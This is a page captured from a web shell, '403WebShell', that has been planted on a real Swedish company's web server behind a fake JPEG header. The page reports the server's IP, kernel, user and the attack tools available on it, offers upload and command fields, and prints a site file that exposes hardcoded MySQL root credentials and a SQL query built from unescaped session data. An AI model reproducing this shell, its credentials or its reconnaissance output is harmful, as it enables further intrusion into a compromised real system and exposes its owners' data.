????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.183.98
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/digitaliseringstrappan.astacus.se/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/digitaliseringstrappan.astacus.se/download.php
<?php
    session_start();

    if($_SESSION['DIGTRAPP_LOGIN'][0] == ""){
        header("location: index.php");
    }

    $link = mysql_connect ("localhost", "root", "root123");
    mysql_select_db ("fi2xml_tool");


	$sql = "SELECT * FROM tblLicenses WHERE id = '".$_SESSION['DIGTRAPP_LOGIN'][0]."'";
   
	$result = mysql_query($sql);
    while ($row = mysql_fetch_assoc($result)){ 
        $SystemUserId = $row['id'];
        $Admin = $row['Admin'];
        $CompanyId = $row['CompanyId'];
        $Username = $row['Username'];
        $Company = $row['Company'];
        $GUID = $row['GUID'];
        
    }
?>

<!DOCTYPE html>
<html lang="sv">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Konto - Webbportal</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <!-- Sidebar Menu -->
    <aside id="sidebar"><br>
ASTACUS TOOLBOX<br>
<hr>
<nav>
  <ul>
	  


    <li><a href="konto.php"><img src="images/konto.png" width="15" height="15" alt="" class="center"/> Konto / Licens</a></li>
    <?php if($Admin == "1"){?>
    <li><a href="admin.php"><img src="images/admin.png" width="15" height="15" alt="" class="center"/> Administration</a></li>
    <?php }?>
    <li><a href="download.php"><img src="images/download.png" width="15" height="15" alt="" class="center"/> Nedladdning</a></li>
    <li><a href="support.php"><img src="images/support.png" width="15" height="15" alt="" class="center"/> Support</a></li>
  </ul>
  <br>
  <hr>
  <ul>
    <li><a href="index.php?logout=true">Logga ut</a></li>
  </ul>
</nav>
<nav>
      </nav>
    </aside>

    <!-- User Account Section -->
    <main>
        <section id="account-section">
            <h2>Download
       
          </h2>Här kan du ladda ner den senaste versionen av toolboxen.
			<br>
			<br>Revit<hr>
			<a href="https://digitaliseringstrappan.astacus.se/downloads/Revit%2024.00.0416.zip">24.00.0416 </a><br><br>
			<br>
		  AutoCAD
<hr>
      <a href="https://digitaliseringstrappan.astacus.se/downloads/AutoCAD%2024.00.0801.zip">24.00.0801 </a></section>
    </main>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit